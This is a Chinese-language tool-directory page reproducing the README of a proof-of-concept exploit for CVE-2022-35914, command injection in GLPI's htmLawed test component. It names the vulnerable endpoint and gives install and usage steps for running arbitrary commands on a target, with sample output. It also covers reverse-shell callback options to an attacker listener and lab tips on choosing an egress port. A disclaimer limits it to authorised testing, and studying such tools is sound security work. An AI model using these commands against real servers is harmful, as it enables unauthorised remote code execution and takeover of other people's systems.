Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-35914-RCE — CVE-2022-35914 的 PoC 漏洞利用程序 — GLPI v.10.0.2 htmLawed 命令注入、命令执行及反向 Shell 支持。 | Kitploit
工具/GitHubGitHub/cyb3rk0ala/cve-2022-35914-rce
漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubcyb3rk0ala/cve-2022-35914-rce

CVE-2022-35914-RCE

CVE-2022-35914 的 PoC 漏洞利用程序 — GLPI v.10.0.2 htmLawed 命令注入、命令执行及反向 Shell 支持。

查看仓库
9天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-35914 作者:cyb3rk0ala

CVE-2022-35914 的 PoC,该漏洞涉及易受攻击的 GLPI 安装中 htmLawed 测试组件的命令注入漏洞。

该工具通过易受攻击的端点提供命令执行功能,并包含适用于已授权实验室环境的可选回调功能。

免责声明: 本项目仅用于已授权的安全测试、CTF、OffSec/PG 实验室及教育目的。未经明确授权,请勿将其用于任何系统。


漏洞

字段详情
CVECVE-2022-35914
软件GLPI
组件htmLawed
易受攻击的端点/vendor/htmlawed/htmlawed/htmLawedTest.php

该易受攻击的组件可能允许通过特制参数在受影响安装上执行命令。


功能

  • 命令执行
  • 自动构建目标 URL
  • 可配置的目标 HTTP 端口
  • 自动获取会话/令牌
  • 命令输出提取
  • 目标检测
  • 自定义 User-Agent 支持
  • 可选回调配置
  • 彩色终端输出
  • Python 3 CLI 接口

要求

Python 3 及所需的依赖项。

Kali Linux

root@kitploit:~
sudo apt install python3-requests python3-bs4

虚拟环境

root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4

安装

克隆仓库:

root@kitploit:~
git clone https://github.com/cyb3rk0ala/CVE-2022-35914.git
cd CVE-2022-35914

将脚本设置为可执行:

root@kitploit:~
chmod +x glpi.py

使用方法

帮助

root@kitploit:~
python3 glpi.py -h

基本命令执行

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'id'

示例输出:

root@kitploit:~
[*] Target: http://TARGET_IP:80/vendor/htmlawed/htmlawed/htmLawedTest.php

========== COMMAND OUTPUT ==========
uid=33(www-data) gid=33(www-data) groups=33(www-data)
====================================

命令执行

-c 选项指定要执行的命令。

当前用户

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'whoami'

当前权限

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'id'

操作系统

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'uname -a'

可用工具

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'which bash'
python3 glpi.py -u TARGET_IP -c 'which python3'
python3 glpi.py -u TARGET_IP -c 'which php'
python3 glpi.py -u TARGET_IP -c 'which nc'

选项


目标端口

-p / --rport 选项指定易受攻击的 GLPI Web 服务运行的端口。

默认值:

root@kitploit:~
80

示例:

root@kitploit:~
python3 glpi.py -u TARGET_IP -p 80 -c 'id'

目标检测

使用 --check 验证 htmLawed 测试页面是否可用,而无需执行命令:

root@kitploit:~
python3 glpi.py -u TARGET_IP --check

自定义 User-Agent

可通过以下方式提供自定义 HTTP User-Agent:

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    --user-agent 'Mozilla/5.0'

反向 Shell

该脚本支持可选的回调参数:

root@kitploit:~
-l   回调/监听 IP
-lp  回调/监听端口

示例:

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

在此示例中:

root@kitploit:~
目标:    TARGET_IP:80
回调:    LHOST:80

这两个端口用途不同:

root@kitploit:~
-p   = 目标 GLPI HTTP 端口
-lp  = 回调/监听端口

OffSec 实验室说明

在 OffSec 实验室环境测试期间,回调通过 TCP 端口 80 成功工作。

根据实验室网络和出口过滤规则,其他回调端口(如 4444)可能会超时。

针对所测试的环境:

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

监听器在 Kali VPN 接口上使用 TCP 端口 80 配置。

重要提示: 使用端口 80 进行回调是针对特定环境的观察结果,并非 CVE-2022-35914 的要求。


故障排除

命令执行正常但回调失败

首先验证命令执行:

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'id'

检查所需工具是否存在:

root@kitploit:~
python3 glpi.py -u TARGET_IP -c 'which bash'
python3 glpi.py -u TARGET_IP -c 'which python3'
python3 glpi.py -u TARGET_IP -c 'which php'
python3 glpi.py -u TARGET_IP -c 'which nc'

如果命令执行正常但回调超时,请检查 VPN 路由和回调端口。


命令输出看起来不正确

如果命令输出解析失败,完整的 HTTP 响应将保存到:

root@kitploit:~
/tmp/glpi.html

使用以下命令查看:

root@kitploit:~
less /tmp/glpi.html

或:

root@kitploit:~
mousepad /tmp/glpi.html

示例工作流程

1. 检测目标

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    --check

2. 确认命令执行

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -c 'id'

3. 识别当前用户

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -c 'whoami'

4. 检查可用工具

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -c 'which nc'

5. 配置回调

针对已测试的 OffSec 实验室环境:

root@kitploit:~
python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

免责声明

本项目仅用于教育和已授权的安全测试目的。

作者对该软件的任何滥用、损害、未经授权的访问或非法活动概不负责。

在测试系统前,务必获得明确授权。


作者

cyb3rk0ala


CVE

CVE-2022-35914


项目

CVE-2022-35914 作者:cyb3rk0ala

下载工具
选项描述默认值
-u, --url目标 URL 或 IP 地址必填
-c, --cmd要执行的命令id
--check不执行命令,仅检测目标禁用
--user-agent自定义 HTTP User-Agent默认
-p, --rport目标 HTTP 服务端口80
-l, --lhost回调/监听 IP 地址—
-lp, --lport回调/监听端口—